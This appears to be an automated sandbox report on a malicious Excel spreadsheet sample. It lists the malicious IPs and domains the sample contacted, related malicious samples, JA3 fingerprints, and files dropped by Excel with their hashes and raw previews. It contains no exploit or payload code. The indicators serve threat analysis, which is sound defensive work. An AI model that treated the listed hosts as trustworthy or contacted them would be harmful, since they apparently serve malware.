                                                                                                                                                  46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                  192.185.32.232
                                                                                                                                                  fcventasyservicios.clUnited States
                                                                                                                                                  46606UNIFIEDLAYER-AS-1USfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                  Analysis ID:412373
                                                                                                                                                  Start date:12.05.2021
                                                                                                                                                  Start time:16:55:19
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 5m 21s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:090811fa_by_Libranalysis.xls
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:30
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal76.expl.evad.winXLS@5/6@2/2
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:Failed
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xls
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  No simulations

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  192.185.39.58090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                    54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                      54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                        afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                            8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                              8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                    9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                      46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                        46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          192.185.32.232090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                            54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                              54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                            9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                46747509_by_Libranalysis.xlsGet hashmaliciousBrowse

                                                                                                                                                                                                  Domains

                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                  signifysystem.com54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  fcventasyservicios.cl090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232

                                                                                                                                                                                                  ASN

                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                  UNIFIEDLAYER-AS-1US090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  70654 SSEBACIC EGYPT.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.254.185.244
                                                                                                                                                                                                  8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.232.222.43
                                                                                                                                                                                                  abc8a77f_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                  • 67.20.76.71
                                                                                                                                                                                                  Revised Invoice pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.171.219
                                                                                                                                                                                                  DINTEC HCU24021ED.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 162.241.169.22
                                                                                                                                                                                                  dd9097e7_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.171.219
                                                                                                                                                                                                  RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.129.32
                                                                                                                                                                                                  Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 162.241.62.63
                                                                                                                                                                                                  UNIFIEDLAYER-AS-1US090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  70654 SSEBACIC EGYPT.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.254.185.244
                                                                                                                                                                                                  8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.232.222.43
                                                                                                                                                                                                  abc8a77f_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                  • 67.20.76.71
                                                                                                                                                                                                  Revised Invoice pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.171.219
                                                                                                                                                                                                  DINTEC HCU24021ED.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 162.241.169.22
                                                                                                                                                                                                  dd9097e7_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.171.219
                                                                                                                                                                                                  RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.129.32
                                                                                                                                                                                                  Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 162.241.62.63

                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                  37f463bf4616ecd445d4a1937da06e1954402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  LMNF434.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  SF65G55121E0FE25552.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  rF27d1O1O2.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  cSvu8bTzJU.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  Contract_kyrgyzstan_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  DHL_988121.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  DHL_988121.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  SMC PO 1083 SAJ 1946 .exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  catalog-949138716.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  - FAX ID 74172012198198.htmGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  #Ud83d#Udd7b Missed Playback Recording.wav - 1424592794.htmGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  • 192.185.39.58
                                                                                                                                                                                                  Cotizacii#U00f3n.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  • 192.185.32.232
                                                                                                                                                                                                  • 192.185.39.58

                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                  No context

                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\B99E5236-A278-4329-AD10-8C7390047CAE
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):134558
                                                                                                                                                                                                  Entropy (8bit):5.368394537130273
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:HcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:sEQ9DQW+zPXO8
                                                                                                                                                                                                  MD5:09C0B583CD51672BB1521BD1C36DAFC2
                                                                                                                                                                                                  SHA1:97C8F703D22A40F3698EB7F3450EE447F1DAC153
                                                                                                                                                                                                  SHA-256:54925EA0DB2CC38DC9E34843E55C6BEA7971EFCAEF09ED2433FF152C6CB452A7
                                                                                                                                                                                                  SHA-512:9A2C727EFA911E73AA9669FF81E2A4F81ED9AB6CB7FB16D201CD81719DFC65922D2D1E883830EAED30A34146BB24E6876BC43D9A190CCC233433940832218CDE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-12T14:56:25">.. Build: 16.0.14108.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\21C10000
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):81549
                                                                                                                                                                                                  Entropy (8bit):7.910479773875078
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:BWjYO+nffSDcn9iZtJOXAQR2KtCbuMB/yDL4kymYBO0y7zBr4ZLJLe:E+nHSD8YZo/Uh0ZymYQ0y7FALte
                                                                                                                                                                                                  MD5:4E6E9512073AE5D0A325BFF83ADA3376
                                                                                                                                                                                                  SHA1:B96CA44CA4855F3AFDACD83D0DEAC2A3574E5C3C
                                                                                                                                                                                                  SHA-256:6E06AD664887623A48E7E6558FF38BADA410CC222AA23294ABAAFD79419801EF
                                                                                                                                                                                                  SHA-512:E58E13E244D62E0B3392CFD1700616A89D5EA7D955BE60C17E28AB207C78E86D1C0A2AD03542E3A223A61FA70130D221AF012976B399F1547E3ADE1CC5378913
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview: .U.N#1..#.?.|.u;p..Q:.f.. .|.cW..x..@......ek....R....jaM....w-;oF..'..k......U..S.x.-[.......2.V.v.>..s.=X....hf...^c..s.....~q.]...9.d..f...zA.+'S.X.g.].j...h)...ON}...l.%(/.-Q7."..=@...Q.b....0d|.fp.'Mm..<.....0....B.R....RX;.........Q+..DL..RZ|a......f?I..b....).5V.....9...=J........I.._.....Q|.5....=T.bH._...k..vSQF.-....^..._.9.#....."=....>Q[...{..>T...._?....h......R..0<.....u ".I..m...E..'/7.CB....4y.......PK..........!..!.9............[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\090811fa_by_Libranalysis.xls.LNK
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:47 2020, mtime=Wed May 12 22:56:28 2021, atime=Wed May 12 22:56:28 2021, length=177152, window=hide
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2250
                                                                                                                                                                                                  Entropy (8bit):4.676160987915277
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:8AUkOEEwcN0UkOEEVB6pAUkOEEwcN0UkOEEVB6:8AUkFiN0UkFEVKAUkFiN0UkFEV
                                                                                                                                                                                                  MD5:A6A48ACD43A4D60907DDC33E6D4BCA99
                                                                                                                                                                                                  SHA1:B0ED7383FDC584D810814BC390BF31F7E81186DD
                                                                                                                                                                                                  SHA-256:304BD731FAADFB548046638F0D99CB4C10082D501A36F38FECF604809796A3FD
                                                                                                                                                                                                  SHA-512:41F15EA6D1B04D0F8908FED498F7DEF667A4100F19A2008A76C31DC63BA18DD918B84C3F6E4C55872327EE5A557C73965FE15E44720ECF780ED33FE6A413A8F6
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview: L..................F.... ...L..:....f.l.G...f.l.G...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qyx..user.<.......Ny..R.......S......................Z.h.a.r.d.z.....~.1.....>Q|x..Desktop.h.......Ny..R.......Y..............>....../2.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.. .090811~1.XLS..j......>Qxx.R......h......................lW.0.9.0.8.1.1.f.a._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.......b...............-.......a...........>.S......C:\Users\user\Desktop\090811fa_by_Libranalysis.xls..3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.0.9.0.8.1.1.f.a._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.........:..,.LB.)...As...`.......X.......468325...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.
                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Wed May 12 22:56:28 2021, atime=Wed May 12 22:56:28 2021, length=12288, window=hide
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):904
                                                                                                                                                                                                  Entropy (8bit):4.647536624806349
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:8ecXUAuElPCH2Jg5nSYBs3W+WrjAZ/2bDBLC5Lu4t2Y+xIBjKZm:8er5n1AZiD487aB6m
                                                                                                                                                                                                  MD5:9EDDC196E82E41690772AAA7D0D389DC
                                                                                                                                                                                                  SHA1:323CE9C7A5AAC5373BBA99FD627A674B509B4B30
                                                                                                                                                                                                  SHA-256:9C24E0C5685B428DB2DEB1E6CE75AD0AB99C7AB95C9E7C9B9F19530DF1381598
                                                                                                                                                                                                  SHA-512:F3CB8A10D3B7D01B19AC19D9B1B646195C283AE5437EDE41CD7FD35E75DF592EDDA3B0A8E896E3D971D5639B94516A681CFE270436C7E6CD5EC432BDBA35E257
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview: L..................F........N....-.....l.G..di.l.G...0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qyx..user.<.......Ny..R.......S......................Z.h.a.r.d.z.....~.1......R....Desktop.h.......Ny..R.......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......468325...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):137
                                                                                                                                                                                                  Entropy (8bit):4.616107791757186
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:oyBVomMNcBo/UwSLMd12Ro/UwSLMd1mMNcBo/UwSLMd1v:dj6NcysNrCsNaNcysNS
                                                                                                                                                                                                  MD5:0B1069AFBBCCB343F3202A219E5B8B35
                                                                                                                                                                                                  SHA1:21D9CC307C660E271204E031EE31EDA332AE73BC
                                                                                                                                                                                                  SHA-256:775048B90A222A3969426DF3C72E2CC7E13BBE0F7FE4C8D900A981D5D744865F
                                                                                                                                                                                                  SHA-512:FA54B38A97059A16CCEC4E65E95CA72332D225B8D797443F07C9A8B1A71B4D1B31D1F0F456E30170A70FCB786E1A0694CE343679A908CD19E6278E0AB3C65F09
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview: Desktop.LNK=0..[xls]..090811fa_by_Libranalysis.xls.LNK=0..090811fa_by_Libranalysis.xls.LNK=0..[xls]..090811fa_by_Libranalysis.xls.LNK=0..
                                                                                                                                                                                                  C:\Users\user\Desktop\22C10000
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):228873
                                                                                                                                                                                                  Entropy (8bit):5.616071094564814
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:y7NiRdSD8YNoTU90uDfzn3bB0X7vrPlsrXvLlL7Ld7Niuw:jRdTrTU9ZFyuw
                                                                                                                                                                                                  MD5:953337305CA5176874886A28051C3B9E
                                                                                                                                                                                                  SHA1:6C2C6C350A71C9AEA26B4E16B27E7C359D14712D
                                                                                                                                                                                                  SHA-256:7C283328F2352FB76F9E1F4DFFF9A65A21A0E831CA3E4EF5E8239E631F48356F
                                                                                                                                                                                                  SHA-512:F29862EB6FB74F4F2389F1766096CED21F078E1F788F127A72EE51B62312F8F92EF2F92633941EDCC9D589AD776A49C96286EEC42E46AA2319A294B4C0FF60C7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview: ........T8..........................\.p....pratesh B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...,...8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......<...........A.r.i.a.l.1.......4...........A.r.i.a.l.1.......4...........A.r.i.a.l.1...h...8...........C.a.m.b.r.i.a.1...................C.a.l.i.b.r.i.1................)..A.r.i.a.l.1................)..A.r.i.a.l.1.......>........)..A.r.i.a.l.1.......?........)..A.r.i.a.l.1................)..A.r.i.a.l.1................)..A.r.i.a.l.1................)..C.a.l.i.b.r.i.1................)..A.r.i.a.l.1................)..A.r.i.a.l.1................)..A.r.i.a.l.1...............

                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                  General

